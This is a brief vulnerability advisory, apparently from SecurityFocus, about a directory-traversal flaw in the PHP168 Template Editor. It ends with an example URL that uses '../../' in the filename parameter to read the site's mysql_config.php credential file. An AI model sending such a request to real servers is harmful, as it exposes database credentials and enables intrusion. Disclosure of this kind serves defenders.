7 lines
No EOL
481 B
Text
7 lines
No EOL
481 B
Text
source: http://www.securityfocus.com/bid/42174/info
|
|
|
|
PHP168 Template Editor is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
|
|
|
|
Exploiting the issue may allow an attacker to read and overwrite arbitrary files in the context of the webserver. This may aid in further attacks
|
|
|
|
http://www.example.com/background catalog/index.php?Lfj =style& job=ditcode&keywords=default& filename =../../ php168/mysql_config.php |